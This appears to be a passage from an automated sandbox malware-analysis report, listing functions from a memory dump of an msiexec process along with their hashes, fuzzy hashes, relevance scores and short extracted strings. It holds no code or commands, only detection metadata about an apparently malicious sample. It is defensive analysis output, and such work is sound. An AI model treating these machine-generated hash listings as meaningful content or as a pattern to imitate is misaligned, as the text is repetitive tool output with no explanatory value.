                                                                                                                                                                            • Instruction ID: 75f18e5c7a628b808a662e62367275b2ed6e69f333c180eb9d8ef60f99e1e3e5
                                                                                                                                                                            • Opcode Fuzzy Hash: f80c8cf7b8ced6e6ec5cd4f780b6b9d4da88ee4bf33d74fb9a31cc0edfb66dc5
                                                                                                                                                                            • Instruction Fuzzy Hash: 20D0673BB40018DFCB049F9DE8448DDFBB6FB98261B548116F915E3261C6319925DB54
                                                                                                                                                                            Function 02BE6748 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f5ad8e6bc0641a78395157e061394a94a7dbba1c08b4495ba6ce8af7b43b334a
                                                                                                                                                                            • Instruction ID: 6df1255d0211883b72cfbd705f542be1debba012634458a2345d3e2c8314db96
                                                                                                                                                                            • Opcode Fuzzy Hash: f5ad8e6bc0641a78395157e061394a94a7dbba1c08b4495ba6ce8af7b43b334a
                                                                                                                                                                            • Instruction Fuzzy Hash: 34C012300543084EC502E765DD55955B76FE6802107449560A0050A65EDF7C5CC94E90

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Function 02BE7118 Relevance: 6.6, Strings: 5, Instructions: 348COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                                            • API String ID: 0-2525668591
                                                                                                                                                                            • Opcode ID: fcfcfc593b93dcf4714d9a4d6b78e45d3ca13b17dfe238fdb9f0f79b01223f38
                                                                                                                                                                            • Instruction ID: 747ed112d078c586ec6a524a29ee8583ca082cc6c8c2c6eb3cda0e133dbe7e51
                                                                                                                                                                            • Opcode Fuzzy Hash: fcfcfc593b93dcf4714d9a4d6b78e45d3ca13b17dfe238fdb9f0f79b01223f38
                                                                                                                                                                            • Instruction Fuzzy Hash: 15E12C30A00119DFCF15CFA9C884AADFBF2FF89314F698195E856AB265DB30E941DB50
                                                                                                                                                                            Function 02BEF961 Relevance: .3, Instructions: 274COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c605b1a40ea20fcd4cba325c2d93090e4518b773e74b4fd2529f2219bbd941ca
                                                                                                                                                                            • Instruction ID: 921503627a381ff9b109f5e653a1d72b27cf05522287fd12f805791728c55862
                                                                                                                                                                            • Opcode Fuzzy Hash: c605b1a40ea20fcd4cba325c2d93090e4518b773e74b4fd2529f2219bbd941ca
                                                                                                                                                                            • Instruction Fuzzy Hash: 31C1AF74E10218CFDB54DFA5C994BADBBB2BF89300F6081A9D409AB364DB359E85CF50
                                                                                                                                                                            Function 02BEF2C0 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2e08506a12c7964cdd8dc954e8ab22e7418107dac948386e748d1c5bbfee7c8b
                                                                                                                                                                            • Instruction ID: 112190bfc3c76c1d58e616edf401fbaff63110ec22d0a5d1e72cc920da5d6327
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e08506a12c7964cdd8dc954e8ab22e7418107dac948386e748d1c5bbfee7c8b
                                                                                                                                                                            • Instruction Fuzzy Hash: B6511170D11208CBDB04EFA9C484BEEBBB2BF89304F24D5A9D406BB694DB759881CF54
                                                                                                                                                                            Function 02BEF4AC Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 406aa0d7defdb0392dbead1eb23524198ed83dbb6a266571e8cf45fcd79fe737
                                                                                                                                                                            • Instruction ID: 0799b4217262e050016802af4c58ae47ed5bfda286b1db5debda470b2f7618b9
                                                                                                                                                                            • Opcode Fuzzy Hash: 406aa0d7defdb0392dbead1eb23524198ed83dbb6a266571e8cf45fcd79fe737
                                                                                                                                                                            • Instruction Fuzzy Hash: 34511F70D05208CBDF14EFA8D488BEDBBB2FF49314F2491A9D016AB694DB399881CF54
                                                                                                                                                                            Function 02BE7700 Relevance: 10.4, Strings: 8, Instructions: 450COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                                            • API String ID: 0-1932283790
                                                                                                                                                                            • Opcode ID: 8682e59767c241465d02116e11e03048e4d0a709bc3d8ecb172b5803b3bf0df4
                                                                                                                                                                            • Instruction ID: bbed49265d9271d33bdbabc702ce6bdbc16de203d57b7e5f7649f46681129694
                                                                                                                                                                            • Opcode Fuzzy Hash: 8682e59767c241465d02116e11e03048e4d0a709bc3d8ecb172b5803b3bf0df4
                                                                                                                                                                            • Instruction Fuzzy Hash: 82122630A002099FCF24CF69D994AAEFBF2FF48314F158599E41AAB361DB30E945DB50
                                                                                                                                                                            Function 02BE2A69 Relevance: 5.1, Strings: 4, Instructions: 96COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                                                                                            • API String ID: 0-2732225958
                                                                                                                                                                            • Opcode ID: b580d808462e6dcbb001a2d8e44488c66f6cd3212125e62d6552510a2020d21c
                                                                                                                                                                            • Instruction ID: b85157e8ff1709544de61b5ad467d5eb4ef0aa309c2371a851f634ccd2a81bb3
                                                                                                                                                                            • Opcode Fuzzy Hash: b580d808462e6dcbb001a2d8e44488c66f6cd3212125e62d6552510a2020d21c
                                                                                                                                                                            • Instruction Fuzzy Hash: A1315071E042198BDF64DF798A8137FB7BAEB84300F1444F5C81AA7294DB74CA85CB92
                                                                                                                                                                            Function 02BE6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2962879850.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2be0000_msiexec.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                                                                            • API String ID: 0-3001612457
                                                                                                                                                                            • Opcode ID: 0273d8d94baf505e91693c50d7246c50057301aa4ac7215e52eb27781fdd969a
                                                                                                                                                                            • Instruction ID: 1cdcc85d3f5aac27d68a0d97c1515a3acaf2d458050b4bb0f69f63c6c639e0ad
                                                                                                                                                                            • Opcode Fuzzy Hash: 0273d8d94baf505e91693c50d7246c50057301aa4ac7215e52eb27781fdd969a
                                                                                                                                                                            • Instruction Fuzzy Hash: 32019A39B401048F8F2C8E2CC548A2933EEEBBCA6072545AAE647CF3B4DB21EC418750